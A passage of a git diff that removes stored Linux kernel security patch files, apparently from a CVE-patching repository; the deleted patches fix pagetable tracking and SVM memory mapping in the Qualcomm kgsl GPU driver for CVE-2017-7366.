- 	struct mdp_destination_scaler_data __user *ds_data_user;
-@@ -4544,6 +4544,7 @@ static int __mdss_fb_copy_destscaler_data(struct fb_info *info,
- 					data_size);
- 			if (ret) {
- 				pr_err("scale data copy from user failed\n");
-+				kfree(scale_data);
- 				goto err;
- 			}
- 		}
-@@ -4553,7 +4554,7 @@ static int __mdss_fb_copy_destscaler_data(struct fb_info *info,
- 
- err:
- 	if (ds_data) {
--		for (i = 0; i < commit->commit_v1.dest_scaler_cnt; i++) {
-+		for (i--; i >= 0; i--) {
- 			scale_data = to_user_ptr(ds_data[i].scale);
- 			kfree(scale_data);
- 		}
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-7366/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-7366/ANY/0001.patch
deleted file mode 100644
index 2bf4e77c..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7366/ANY/0001.patch
+++ /dev/null
@@ -1,457 +0,0 @@
-From f4c9ffd6cd7960265f38e285ac43cbecf2459e45 Mon Sep 17 00:00:00 2001
-From: Jordan Crouse <jcrouse@codeaurora.org>
-Date: Tue, 31 May 2016 11:24:23 -0600
-Subject: msm: kgsl: Fix pagetable member of struct kgsl_memdesc
-
-memdesc->pagetable is supposed to help ensure that memory gets
-unmapped before it is freed, but the pagetable member is being
-populated at create time not when the buffer gets mapped. This
-forces the developer to ensure that the same pagetable is
-used for both the create and map step. Instead, assign the
-pagetable member when it is first used (to get a GPU address)
-and put it away when the GPU address is released.
-
-Change-Id: Ic0dedbad372fd9029b932dd99633a650049751ed
-Signed-off-by: Jordan Crouse <jcrouse@codeaurora.org>
-Signed-off-by: Sudeep Yedalapure <sudeepy@codeaurora.org>
----
- drivers/gpu/msm/adreno_a5xx.c    |  4 ++--
- drivers/gpu/msm/kgsl.c           | 33 +++++++--------------------------
- drivers/gpu/msm/kgsl_iommu.c     | 35 +++++++++++++++++++----------------
- drivers/gpu/msm/kgsl_mmu.c       | 29 +++++++++++++++++++++++------
- drivers/gpu/msm/kgsl_mmu.h       |  7 +++----
- drivers/gpu/msm/kgsl_sharedmem.c | 27 ++++++++-------------------
- drivers/gpu/msm/kgsl_sharedmem.h | 11 ++++-------
- 7 files changed, 66 insertions(+), 80 deletions(-)
-
-diff --git a/drivers/gpu/msm/adreno_a5xx.c b/drivers/gpu/msm/adreno_a5xx.c
-index f770972..bcef03e 100644
---- a/drivers/gpu/msm/adreno_a5xx.c
-+++ b/drivers/gpu/msm/adreno_a5xx.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2014-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2014-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -250,7 +250,7 @@ static int a5xx_critical_packet_construct(struct adreno_device *adreno_dev)
- 		return ret;
- 
- 	ret = kgsl_allocate_user(&adreno_dev->dev, &crit_pkts_refbuf0,
--					NULL, PAGE_SIZE, KGSL_MEMFLAGS_SECURE);
-+		PAGE_SIZE, KGSL_MEMFLAGS_SECURE);
- 	if (ret)
- 		return ret;
- 
-diff --git a/drivers/gpu/msm/kgsl.c b/drivers/gpu/msm/kgsl.c
-index d06eebb..bd022f1 100644
---- a/drivers/gpu/msm/kgsl.c
-+++ b/drivers/gpu/msm/kgsl.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2008-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2008-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -370,24 +370,6 @@ kgsl_mem_entry_track_gpuaddr(struct kgsl_process_private *process,
- 	return kgsl_mmu_get_gpuaddr(pagetable, &entry->memdesc);
- }
- 
--/**
-- * kgsl_mem_entry_untrack_gpuaddr() - Untrack memory that is previously tracked
-- * process - Pointer to process private to which memory belongs
-- * entry - Memory entry to untrack
-- *
-- * Function just does the opposite of kgsl_mem_entry_track_gpuaddr. Needs to be
-- * called with processes spin lock held
-- */
--static void
--kgsl_mem_entry_untrack_gpuaddr(struct kgsl_process_private *process,
--				struct kgsl_mem_entry *entry)
--{
--	struct kgsl_pagetable *pagetable = entry->memdesc.pagetable;
--
--	if (entry->memdesc.gpuaddr)
--		kgsl_mmu_put_gpuaddr(pagetable, &entry->memdesc);
--}
--
- /* Commit the entry to the process so it can be accessed by other operations */
- static void kgsl_mem_entry_commit_process(struct kgsl_mem_entry *entry)
- {
-@@ -436,7 +418,7 @@ kgsl_mem_entry_attach_process(struct kgsl_mem_entry *entry,
- 
- 	if (id < 0) {
- 		ret = id;
--		kgsl_mem_entry_untrack_gpuaddr(process, entry);
-+		kgsl_mmu_put_gpuaddr(&entry->memdesc);
- 		goto err_put_proc_priv;
- 	}
- 
-@@ -472,6 +454,7 @@ err_put_proc_priv:
- static void kgsl_mem_entry_detach_process(struct kgsl_mem_entry *entry)
- {
- 	unsigned int type;
-+
- 	if (entry == NULL)
- 		return;
- 
-@@ -488,9 +471,7 @@ static void kgsl_mem_entry_detach_process(struct kgsl_mem_entry *entry)
- 	entry->priv->stats[type].cur -= entry->memdesc.size;
- 	spin_unlock(&entry->priv->mem_lock);
- 
--	kgsl_mmu_unmap(entry->memdesc.pagetable, &entry->memdesc);
--
--	kgsl_mem_entry_untrack_gpuaddr(entry->priv, entry);
-+	kgsl_mmu_put_gpuaddr(&entry->memdesc);
- 
- 	kgsl_process_private_put(entry->priv);
- 
-@@ -3021,7 +3002,7 @@ static struct kgsl_mem_entry *gpumem_alloc_entry(
- 		entry->memdesc.priv |= KGSL_MEMDESC_SECURE;
- 
- 	ret = kgsl_allocate_user(dev_priv->device, &entry->memdesc,
--				private->pagetable, size, flags);
-+		size, flags);
- 	if (ret != 0)
- 		goto err;
- 
-@@ -3442,11 +3423,11 @@ static unsigned long _gpu_set_svm_region(struct kgsl_process_private *private,
- 		return ret;
- 
- 	entry->memdesc.gpuaddr = (uint64_t) addr;
-+	entry->memdesc.pagetable = private->pagetable;
- 
- 	ret = kgsl_mmu_map(private->pagetable, &entry->memdesc);
- 	if (ret) {
--		kgsl_mmu_put_gpuaddr(private->pagetable,
--				&entry->memdesc);
-+		kgsl_mmu_put_gpuaddr(&entry->memdesc);
- 		return ret;
- 	}
- 
-diff --git a/drivers/gpu/msm/kgsl_iommu.c b/drivers/gpu/msm/kgsl_iommu.c
-index 0d207494c..724d129 100644
---- a/drivers/gpu/msm/kgsl_iommu.c
-+++ b/drivers/gpu/msm/kgsl_iommu.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2011-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2011-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -1402,17 +1402,16 @@ static int _setstate_alloc(struct kgsl_device *device,
- {
- 	int ret;
- 
--	ret = kgsl_sharedmem_alloc_contig(device, &iommu->setstate, NULL,
--		PAGE_SIZE);
--	if (ret)
--		return ret;
-+	ret = kgsl_sharedmem_alloc_contig(device, &iommu->setstate, PAGE_SIZE);
- 
--	/* Mark the setstate memory as read only */
--	iommu->setstate.flags |= KGSL_MEMFLAGS_GPUREADONLY;
-+	if (!ret) {
-+		/* Mark the setstate memory as read only */
-+		iommu->setstate.flags |= KGSL_MEMFLAGS_GPUREADONLY;
- 
--	kgsl_sharedmem_set(device, &iommu->setstate, 0, 0, PAGE_SIZE);
-+		kgsl_sharedmem_set(device, &iommu->setstate, 0, 0, PAGE_SIZE);
-+	}
- 
--	return 0;
-+	return ret;
- }
- 
- static int kgsl_iommu_init(struct kgsl_mmu *mmu)
-@@ -1663,7 +1662,7 @@ static int _iommu_map_guard_page(struct kgsl_pagetable *pt,
- 
- 		if (!kgsl_secure_guard_page_memdesc.sgt) {
- 			if (kgsl_allocate_user(KGSL_MMU_DEVICE(pt->mmu),
--					&kgsl_secure_guard_page_memdesc, pt,
-+					&kgsl_secure_guard_page_memdesc,
- 					sgp_size, KGSL_MEMFLAGS_SECURE)) {
- 				KGSL_CORE_ERR(
- 					"Secure guard page alloc failed\n");
-@@ -2264,23 +2263,27 @@ static int kgsl_iommu_get_gpuaddr(struct kgsl_pagetable *pagetable,
- 	}
- 
- 	ret = _insert_gpuaddr(pagetable, addr, size);
--	if (ret == 0)
-+	if (ret == 0) {
- 		memdesc->gpuaddr = addr;
-+		memdesc->pagetable = pagetable;
-+	}
- 
- out:
- 	spin_unlock(&pagetable->lock);
- 	return ret;
- }
- 
--static void kgsl_iommu_put_gpuaddr(struct kgsl_pagetable *pagetable,
--		struct kgsl_memdesc *memdesc)
-+static void kgsl_iommu_put_gpuaddr(struct kgsl_memdesc *memdesc)
- {
--	spin_lock(&pagetable->lock);
-+	if (memdesc->pagetable == NULL)
-+		return;
-+
-+	spin_lock(&memdesc->pagetable->lock);
- 
--	if (_remove_gpuaddr(pagetable, memdesc->gpuaddr))
-+	if (_remove_gpuaddr(memdesc->pagetable, memdesc->gpuaddr))
- 		BUG();
- 
--	spin_unlock(&pagetable->lock);
-+	spin_unlock(&memdesc->pagetable->lock);
- }
- 
- static int kgsl_iommu_svm_range(struct kgsl_pagetable *pagetable,
-diff --git a/drivers/gpu/msm/kgsl_mmu.c b/drivers/gpu/msm/kgsl_mmu.c
-index d0c5dc7..99dff79 100644
---- a/drivers/gpu/msm/kgsl_mmu.c
-+++ b/drivers/gpu/msm/kgsl_mmu.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2002,2007-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2002,2007-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -419,17 +419,29 @@ EXPORT_SYMBOL(kgsl_mmu_map);
-  * @pagetable: Pagetable to release the memory from
-  * @memdesc: Memory descriptor containing the GPU address to free
-  */
--void kgsl_mmu_put_gpuaddr(struct kgsl_pagetable *pagetable,
--		struct kgsl_memdesc *memdesc)
-+void kgsl_mmu_put_gpuaddr(struct kgsl_memdesc *memdesc)
- {
-+	struct kgsl_pagetable *pagetable = memdesc->pagetable;
-+	int unmap_fail = 0;
-+
- 	if (memdesc->size == 0 || memdesc->gpuaddr == 0)
- 		return;
- 
--	if (PT_OP_VALID(pagetable, put_gpuaddr))
--		pagetable->pt_ops->put_gpuaddr(pagetable, memdesc);
-+	if (!kgsl_memdesc_is_global(memdesc))
-+		unmap_fail = kgsl_mmu_unmap(pagetable, memdesc);
-+
-+	/*
-+	 * Do not free the gpuaddr/size if unmap fails. Because if we
-+	 * try to map this range in future, the iommu driver will throw
-+	 * a BUG_ON() because it feels we are overwriting a mapping.
-+	*/
-+	if (PT_OP_VALID(pagetable, put_gpuaddr) && (unmap_fail == 0))
-+		pagetable->pt_ops->put_gpuaddr(memdesc);
- 
- 	if (!kgsl_memdesc_is_global(memdesc))
- 		memdesc->gpuaddr = 0;
-+
-+	memdesc->pagetable = NULL;
- }
- EXPORT_SYMBOL(kgsl_mmu_put_gpuaddr);
- 
-@@ -580,7 +592,12 @@ static int nommu_get_gpuaddr(struct kgsl_pagetable *pagetable,
- 
- 	memdesc->gpuaddr = (uint64_t) sg_phys(memdesc->sgt->sgl);
- 
--	return memdesc->gpuaddr != 0 ? 0 : -ENOMEM;
-+	if (memdesc->gpuaddr) {
-+		memdesc->pagetable = pagetable;
-+		return 0;
-+	}
-+
-+	return -ENOMEM;
- }
- 
- static struct kgsl_mmu_pt_ops nommu_pt_ops = {
-diff --git a/drivers/gpu/msm/kgsl_mmu.h b/drivers/gpu/msm/kgsl_mmu.h
-index 93b1f9d..d191b1c 100644
---- a/drivers/gpu/msm/kgsl_mmu.h
-+++ b/drivers/gpu/msm/kgsl_mmu.h
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2002,2007-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2002,2007-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -92,7 +92,7 @@ struct kgsl_mmu_pt_ops {
- 	u64 (*get_ttbr0)(struct kgsl_pagetable *);
- 	u32 (*get_contextidr)(struct kgsl_pagetable *);
- 	int (*get_gpuaddr)(struct kgsl_pagetable *, struct kgsl_memdesc *);
--	void (*put_gpuaddr)(struct kgsl_pagetable *, struct kgsl_memdesc *);
-+	void (*put_gpuaddr)(struct kgsl_memdesc *);
- 	uint64_t (*find_svm_region)(struct kgsl_pagetable *, uint64_t, uint64_t,
- 		uint64_t, uint64_t);
- 	int (*set_svm_region)(struct kgsl_pagetable *, uint64_t, uint64_t);
-@@ -180,8 +180,7 @@ int kgsl_mmu_map(struct kgsl_pagetable *pagetable,
- 		 struct kgsl_memdesc *memdesc);
- int kgsl_mmu_unmap(struct kgsl_pagetable *pagetable,
- 		    struct kgsl_memdesc *memdesc);
--void kgsl_mmu_put_gpuaddr(struct kgsl_pagetable *pagetable,
--		 struct kgsl_memdesc *memdesc);
-+void kgsl_mmu_put_gpuaddr(struct kgsl_memdesc *memdesc);
- unsigned int kgsl_virtaddr_to_physaddr(void *virtaddr);
- unsigned int kgsl_mmu_log_fault_addr(struct kgsl_mmu *mmu,
- 		u64 ttbr0, uint64_t addr);
-diff --git a/drivers/gpu/msm/kgsl_sharedmem.c b/drivers/gpu/msm/kgsl_sharedmem.c
-index 941e4c4..7d7fec7 100644
---- a/drivers/gpu/msm/kgsl_sharedmem.c
-+++ b/drivers/gpu/msm/kgsl_sharedmem.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2002,2007-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2002,2007-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -318,12 +318,11 @@ static int kgsl_cma_alloc_secure(struct kgsl_device *device,
- 
- static int kgsl_allocate_secure(struct kgsl_device *device,
- 				struct kgsl_memdesc *memdesc,
--				struct kgsl_pagetable *pagetable,
- 				uint64_t size) {
- 	int ret;
- 
- 	if (MMU_FEATURE(&device->mmu, KGSL_MMU_HYP_SECURE_ALLOC))
--		ret = kgsl_sharedmem_page_alloc_user(memdesc, pagetable, size);
-+		ret = kgsl_sharedmem_page_alloc_user(memdesc, size);
- 	else
- 		ret = kgsl_cma_alloc_secure(device, memdesc, size);
- 
-@@ -332,7 +331,6 @@ static int kgsl_allocate_secure(struct kgsl_device *device,
- 
- int kgsl_allocate_user(struct kgsl_device *device,
- 		struct kgsl_memdesc *memdesc,
--		struct kgsl_pagetable *pagetable,
- 		uint64_t size, uint64_t flags)
- {
- 	int ret;
-@@ -340,12 +338,11 @@ int kgsl_allocate_user(struct kgsl_device *device,
- 	memdesc->flags = flags;
- 
- 	if (kgsl_mmu_get_mmutype(device) == KGSL_MMU_TYPE_NONE)
--		ret = kgsl_sharedmem_alloc_contig(device, memdesc,
--				pagetable, size);
-+		ret = kgsl_sharedmem_alloc_contig(device, memdesc, size);
- 	else if (flags & KGSL_MEMFLAGS_SECURE)
--		ret = kgsl_allocate_secure(device, memdesc, pagetable, size);
-+		ret = kgsl_allocate_secure(device, memdesc, size);
- 	else
--		ret = kgsl_sharedmem_page_alloc_user(memdesc, pagetable, size);
-+		ret = kgsl_sharedmem_page_alloc_user(memdesc, size);
- 
- 	return ret;
- }
-@@ -637,7 +634,6 @@ static inline int get_page_size(size_t size, unsigned int align)
- 
- int
- kgsl_sharedmem_page_alloc_user(struct kgsl_memdesc *memdesc,
--			struct kgsl_pagetable *pagetable,
- 			uint64_t size)
- {
- 	int ret = 0;
-@@ -671,7 +667,6 @@ kgsl_sharedmem_page_alloc_user(struct kgsl_memdesc *memdesc,
- 
- 	len_alloc = PAGE_ALIGN(size) >> PAGE_SHIFT;
- 
--	memdesc->pagetable = pagetable;
- 	memdesc->ops = &kgsl_page_alloc_ops;
- 
- 	/*
-@@ -805,10 +800,8 @@ void kgsl_sharedmem_free(struct kgsl_memdesc *memdesc)
- 	if (memdesc == NULL || memdesc->size == 0)
- 		return;
- 
--	if (memdesc->gpuaddr) {
--		kgsl_mmu_unmap(memdesc->pagetable, memdesc);
--		kgsl_mmu_put_gpuaddr(memdesc->pagetable, memdesc);
--	}
-+	/* Make sure the memory object has been unmapped */
-+	kgsl_mmu_put_gpuaddr(memdesc);
- 
- 	if (memdesc->ops && memdesc->ops->free)
- 		memdesc->ops->free(memdesc);
-@@ -988,8 +981,7 @@ void kgsl_get_memory_usage(char *name, size_t name_size, uint64_t memflags)
- EXPORT_SYMBOL(kgsl_get_memory_usage);
- 
- int kgsl_sharedmem_alloc_contig(struct kgsl_device *device,
--			struct kgsl_memdesc *memdesc,
--			struct kgsl_pagetable *pagetable, uint64_t size)
-+			struct kgsl_memdesc *memdesc, uint64_t size)
- {
- 	int result = 0;
- 
-@@ -998,7 +990,6 @@ int kgsl_sharedmem_alloc_contig(struct kgsl_device *device,
- 		return -EINVAL;
- 
- 	memdesc->size = size;
--	memdesc->pagetable = pagetable;
- 	memdesc->ops = &kgsl_cma_ops;
- 	memdesc->dev = device->dev->parent;
- 
-@@ -1089,7 +1080,6 @@ static int kgsl_cma_alloc_secure(struct kgsl_device *device,
- {
- 	struct kgsl_iommu *iommu = KGSL_IOMMU_PRIV(device);
- 	int result = 0;
--	struct kgsl_pagetable *pagetable = device->mmu.securepagetable;
- 	size_t aligned;
- 
- 	/* Align size to 1M boundaries */
-@@ -1109,7 +1099,6 @@ static int kgsl_cma_alloc_secure(struct kgsl_device *device,
- 			memdesc->priv &= ~KGSL_MEMDESC_GUARD_PAGE;
- 
- 	memdesc->size = aligned;
--	memdesc->pagetable = pagetable;
- 	memdesc->ops = &kgsl_cma_ops;
- 	memdesc->dev = iommu->ctx[KGSL_IOMMU_CONTEXT_SECURE].dev;
- 
-diff --git a/drivers/gpu/msm/kgsl_sharedmem.h b/drivers/gpu/msm/kgsl_sharedmem.h
-index aae79ad..19477f5 100644
---- a/drivers/gpu/msm/kgsl_sharedmem.h
-+++ b/drivers/gpu/msm/kgsl_sharedmem.h
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2002,2007-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2002,2007-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -26,7 +26,7 @@ struct kgsl_process_private;
- 
- int kgsl_sharedmem_alloc_contig(struct kgsl_device *device,
- 			struct kgsl_memdesc *memdesc,
--			struct kgsl_pagetable *pagetable, uint64_t size);
-+			uint64_t size);
- 
- void kgsl_sharedmem_free(struct kgsl_memdesc *memdesc);
- 
-@@ -66,13 +66,11 @@ void kgsl_sharedmem_uninit_sysfs(void);
- 
- int kgsl_allocate_user(struct kgsl_device *device,
- 		struct kgsl_memdesc *memdesc,
--		struct kgsl_pagetable *pagetable,
- 		uint64_t size, uint64_t flags);
- 
- void kgsl_get_memory_usage(char *str, size_t len, uint64_t memflags);
- 
- int kgsl_sharedmem_page_alloc_user(struct kgsl_memdesc *memdesc,
--				struct kgsl_pagetable *pagetable,
- 				uint64_t size);
- 
- #define MEMFLAGS(_flags, _mask, _shift) \
-@@ -271,11 +269,10 @@ static inline int kgsl_allocate_global(struct kgsl_device *device,
- 	memdesc->priv = priv;
- 
- 	if ((memdesc->priv & KGSL_MEMDESC_CONTIG) != 0)
--		ret = kgsl_sharedmem_alloc_contig(device, memdesc, NULL,
-+		ret = kgsl_sharedmem_alloc_contig(device, memdesc,
- 						(size_t) size);
- 	else {
--		ret = kgsl_sharedmem_page_alloc_user(memdesc, NULL,
--						(size_t) size);
-+		ret = kgsl_sharedmem_page_alloc_user(memdesc, (size_t) size);
- 		if (ret == 0)
- 			kgsl_memdesc_map(memdesc);
- 	}
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-7366/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2017-7366/ANY/0002.patch
deleted file mode 100644
index 4b2c8a54..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7366/ANY/0002.patch
+++ /dev/null
@@ -1,254 +0,0 @@
-From 7c4d5736d32f91f0cafe6cd86d00e26389970b00 Mon Sep 17 00:00:00 2001
-From: Jordan Crouse <jcrouse@codeaurora.org>
-Date: Tue, 31 May 2016 11:24:24 -0600
-Subject: msm: kgsl: Make sure USE_CPU_MAP + MAP_USER_MEM work together
-
-If one is mapping anonyomous user memory in the GPU with SVM enabled
-we want to try to accommodate that request if possible. The memory
-address was being set up correctly in the memory descriptor but
-the GPU address was getting tripped up when getting mapped in the
-process.  This is because the memory should be treated like SVM
-memory so it needs to be registered in the memory tree and the
-rest of the path needs to accept the address.
-
-Change-Id: Ic0dedbad661143977a226d50263c26b5af579ce3
-Signed-off-by: Jordan Crouse <jcrouse@codeaurora.org>
-Signed-off-by: Sudeep Yedalapure <sudeepy@codeaurora.org>
----
- drivers/gpu/msm/kgsl.c | 134 +++++++++++++++++++++----------------------------
- 1 file changed, 57 insertions(+), 77 deletions(-)
-
-diff --git a/drivers/gpu/msm/kgsl.c b/drivers/gpu/msm/kgsl.c
-index bd022f1..db3ba02 100644
---- a/drivers/gpu/msm/kgsl.c
-+++ b/drivers/gpu/msm/kgsl.c
-@@ -166,9 +166,10 @@ int kgsl_memfree_find_entry(pid_t ptname, uint64_t *gpuaddr,
- 	return 0;
- }
- 
--static void kgsl_memfree_purge(pid_t ptname, uint64_t gpuaddr,
--		uint64_t size)
-+static void kgsl_memfree_purge(struct kgsl_pagetable *pagetable,
-+		uint64_t gpuaddr, uint64_t size)
- {
-+	pid_t ptname = pagetable ? pagetable->name : 0;
- 	int i;
- 
- 	if (memfree.list == NULL)
-@@ -332,40 +333,22 @@ kgsl_mem_entry_destroy(struct kref *kref)
- }
- EXPORT_SYMBOL(kgsl_mem_entry_destroy);
- 
--/**
-- * kgsl_mem_entry_track_gpuaddr - Insert a mem_entry in the address tree and
-- * assign it with a gpu address space before insertion
-- * @process: the process that owns the memory
-- * @entry: the memory entry
-- *
-- * @returns - 0 on succcess else error code
-- *
-- * Insert the kgsl_mem_entry in to the rb_tree for searching by GPU address.
-- * The assignment of gpu address and insertion into list needs to
-- * happen with the memory lock held to avoid race conditions between
-- * gpu address being selected and some other thread looking through the
-- * rb list in search of memory based on gpuaddr
-- * This function should be called with processes memory spinlock held
-- */
--static int
--kgsl_mem_entry_track_gpuaddr(struct kgsl_process_private *process,
--				struct kgsl_mem_entry *entry)
-+/* Allocate a IOVA for memory objects that don't use SVM */
-+static int kgsl_mem_entry_track_gpuaddr(struct kgsl_device *device,
-+		struct kgsl_process_private *process,
-+		struct kgsl_mem_entry *entry)
- {
--	struct kgsl_pagetable *pagetable = process->pagetable;
-+	struct kgsl_pagetable *pagetable;
- 
- 	/*
--	 * If cpu=gpu map is used then caller needs to set the
--	 * gpu address
-+	 * If SVM is enabled for this object then the address needs to be
-+	 * assigned elsewhere
- 	 */
--	if (kgsl_memdesc_use_cpu_map(&entry->memdesc)) {
--		if (!entry->memdesc.gpuaddr)
--			return 0;
--	} else if (entry->memdesc.gpuaddr) {
--		WARN_ONCE(1, "gpuaddr assigned w/o holding memory lock\n");
--		return -EINVAL;
--	}
--	if (kgsl_memdesc_is_secured(&entry->memdesc))
--		pagetable = pagetable->mmu->securepagetable;
-+	if (kgsl_memdesc_use_cpu_map(&entry->memdesc))
-+		return 0;
-+
-+	pagetable = kgsl_memdesc_is_secured(&entry->memdesc) ?
-+		device->mmu.securepagetable : process->pagetable;
- 
- 	return kgsl_mmu_get_gpuaddr(pagetable, &entry->memdesc);
- }
-@@ -381,33 +364,25 @@ static void kgsl_mem_entry_commit_process(struct kgsl_mem_entry *entry)
- 	spin_unlock(&entry->priv->mem_lock);
- }
- 
--/**
-- * kgsl_mem_entry_attach_process - Attach a mem_entry to its owner process
-- * @entry: the memory entry
-- * @process: the owner process
-- *
-- * Attach a newly created mem_entry to its owner process so that
-- * it can be found later. The mem_entry will be added to mem_idr and have
-- * its 'id' field assigned.
-- *
-- * @returns - 0 on success or error code on failure.
-+/*
-+ * Attach the memory object to a process by (possibly) getting a GPU address and
-+ * (possibly) mapping it
-  */
--int
--kgsl_mem_entry_attach_process(struct kgsl_mem_entry *entry,
--				   struct kgsl_device_private *dev_priv)
-+static int kgsl_mem_entry_attach_process(struct kgsl_device *device,
-+		struct kgsl_process_private *process,
-+		struct kgsl_mem_entry *entry)
- {
--	int id;
--	int ret;
--	struct kgsl_process_private *process = dev_priv->process_priv;
--	struct kgsl_pagetable *pagetable = NULL;
-+	int id, ret;
- 
- 	ret = kgsl_process_private_get(process);
- 	if (!ret)
- 		return -EBADF;
- 
--	ret = kgsl_mem_entry_track_gpuaddr(process, entry);
--	if (ret)
--		goto err_put_proc_priv;
-+	ret = kgsl_mem_entry_track_gpuaddr(device, process, entry);
-+	if (ret) {
-+		kgsl_process_private_put(process);
-+		return ret;
-+	}
- 
- 	idr_preload(GFP_KERNEL);
- 	spin_lock(&process->mem_lock);
-@@ -417,40 +392,33 @@ kgsl_mem_entry_attach_process(struct kgsl_mem_entry *entry,
- 	idr_preload_end();
- 
- 	if (id < 0) {
--		ret = id;
--		kgsl_mmu_put_gpuaddr(&entry->memdesc);
--		goto err_put_proc_priv;
-+		if (!kgsl_memdesc_use_cpu_map(&entry->memdesc))
-+			kgsl_mmu_put_gpuaddr(&entry->memdesc);
-+		kgsl_process_private_put(process);
-+		return id;
- 	}
- 
- 	entry->id = id;
- 	entry->priv = process;
- 
--	/* map the memory after unlocking if gpuaddr has been assigned */
-+	/*
-+	 * Map the memory if a GPU address is already assigned, either through
-+	 * kgsl_mem_entry_track_gpuaddr() or via some other SVM process
-+	 */
- 	if (entry->memdesc.gpuaddr) {
--		/* if a secured buffer map it to secure global pagetable */
--		if (kgsl_memdesc_is_secured(&entry->memdesc))
--			pagetable = process->pagetable->mmu->securepagetable;
--		else
--			pagetable = process->pagetable;
-+		ret = kgsl_mmu_map(entry->memdesc.pagetable, &entry->memdesc);
- 
--		entry->memdesc.pagetable = pagetable;
--		ret = kgsl_mmu_map(pagetable, &entry->memdesc);
- 		if (ret)
- 			kgsl_mem_entry_detach_process(entry);
- 	}
- 
--	kgsl_memfree_purge(pagetable ? pagetable->name : 0,
--		entry->memdesc.gpuaddr, entry->memdesc.size);
--
--	return ret;
-+	kgsl_memfree_purge(entry->memdesc.pagetable, entry->memdesc.gpuaddr,
-+		entry->memdesc.size);
- 
--err_put_proc_priv:
--	kgsl_process_private_put(process);
- 	return ret;
- }
- 
- /* Detach a memory entry from a process and unmap it from the MMU */
--
- static void kgsl_mem_entry_detach_process(struct kgsl_mem_entry *entry)
- {
- 	unsigned int type;
-@@ -2052,10 +2020,21 @@ static int kgsl_setup_anon_useraddr(struct kgsl_pagetable *pagetable,
- 	entry->memdesc.pagetable = pagetable;
- 	entry->memdesc.size = (uint64_t) size;
- 	entry->memdesc.useraddr = hostptr;
--	if (kgsl_memdesc_use_cpu_map(&entry->memdesc))
--		entry->memdesc.gpuaddr = (uint64_t)  entry->memdesc.useraddr;
- 	entry->memdesc.flags |= KGSL_MEMFLAGS_USERMEM_ADDR;
- 
-+	if (kgsl_memdesc_use_cpu_map(&entry->memdesc)) {
-+		int ret;
-+
-+		/* Register the address in the database */
-+		ret = kgsl_mmu_set_svm_region(pagetable,
-+			(uint64_t) entry->memdesc.useraddr, (uint64_t) size);
-+
-+		if (ret)
-+			return ret;
-+
-+		entry->memdesc.gpuaddr = (uint64_t)  entry->memdesc.useraddr;
-+	}
-+
- 	return memdesc_sg_virt(&entry->memdesc, NULL);
- }
- 
-@@ -2305,7 +2284,7 @@ long kgsl_ioctl_gpuobj_import(struct kgsl_device_private *dev_priv,
- 
- 	param->flags = entry->memdesc.flags;
- 
--	ret = kgsl_mem_entry_attach_process(entry, dev_priv);
-+	ret = kgsl_mem_entry_attach_process(dev_priv->device, private, entry);
- 	if (ret)
- 		goto unmap;
- 
-@@ -2609,7 +2588,8 @@ long kgsl_ioctl_map_user_mem(struct kgsl_device_private *dev_priv,
- 	/* echo back flags */
- 	param->flags = (unsigned int) entry->memdesc.flags;
- 
--	result = kgsl_mem_entry_attach_process(entry, dev_priv);
-+	result = kgsl_mem_entry_attach_process(dev_priv->device, private,
-+		entry);
- 	if (result)
- 		goto error_attach;
- 
-@@ -3006,7 +2986,7 @@ static struct kgsl_mem_entry *gpumem_alloc_entry(
- 	if (ret != 0)
- 		goto err;
- 
--	ret = kgsl_mem_entry_attach_process(entry, dev_priv);
-+	ret = kgsl_mem_entry_attach_process(dev_priv->device, private, entry);
- 	if (ret != 0) {
- 		kgsl_sharedmem_free(&entry->memdesc);
- 		goto err;
-@@ -3431,8 +3411,8 @@ static unsigned long _gpu_set_svm_region(struct kgsl_process_private *private,
- 		return ret;
- 	}
- 
--	kgsl_memfree_purge(private->pagetable ? private->pagetable->name : 0,
--		entry->memdesc.gpuaddr, entry->memdesc.size);
-+	kgsl_memfree_purge(private->pagetable, entry->memdesc.gpuaddr,
-+		entry->memdesc.size);
- 
- 	return addr;
- }
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-7368/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-7368/ANY/0001.patch
deleted file mode 100644
index 8bcd196c..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7368/ANY/0001.patch
+++ /dev/null
@@ -1,368 +0,0 @@
